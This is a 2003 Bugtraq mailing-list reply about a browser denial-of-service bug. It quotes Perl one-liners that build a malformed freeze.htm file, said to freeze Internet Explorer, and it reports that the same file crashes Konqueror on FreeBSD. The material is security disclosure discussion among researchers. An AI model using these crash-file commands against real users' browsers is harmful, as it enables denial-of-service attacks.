Bugtraq mailing list archives
Re: April appeared to be a month of IE bugs. Here's another one.
From: Joachim Stro"mbergson <Joachim.Strombergson () InformAsic com>
Date: Fri, 02 May 2003 10:11:50 +0200
Aloha! ERRor wrote:
Hello, Bugtraq.Malicious htm file can freeze IE with 100% CPU usage: Construct the file freeze.htm: c:\>perl -e "print qq'\xFF\xFE'; print qq'\r\n' x 30000" > freeze.htmThis string works only with Active Perl, in unix-like Perl versions exploit string is: perl -e "print qq'\xFF\xFE'; print qq'\r\r\n' x 30000" > freeze.htm Active Perl understand \n = \x0D\x0A, freeze of IE exist only if sequence of bytes will be ...\x0D\x0D\x0A... Sorry, I have not noticed it at once.
I tested the freeze.htm generated with the revised Perl code in Konqeror 3.0.3 (shipped in KDE 3.0.3). When loading freeze.htm Konqeror core dumps with a bus error almost instantly. Every time. This was tested in FreeBSD 4.7-STABLE.
-- Med va"nlig ha"lsning, Yours Joachim Stro"mbergson - Alltid i harmonisk sva"ngning. VP, Research & Development ---------------------------------------------------------------------- InformAsic AB / Hugo Grauers gata 5B / SE-411 33 GO"TEBORG / Sweden Tel: +46 31 68 54 90 Fax: +46 31 68 54 91 Mobile: +46 733 75 97 02 E-mail: joachim.strombergson () informasic com Home: www.informasic.com ----------------------------------------------------------------------
Current thread:
- Re: April appeared to be a month of IE bugs. Here's another one. ERRor (May 01)
- Re: April appeared to be a month of IE bugs. Here's another one. mbergson <Joachim.Strombergson () InformAsic com> (May 02)
- <Possible follow-ups>
- Re: April appeared to be a month of IE bugs. Here's another one. Cove Schneider (May 01)
- Re: April appeared to be a month of IE bugs. Here's another one. Cove Schneider (May 01)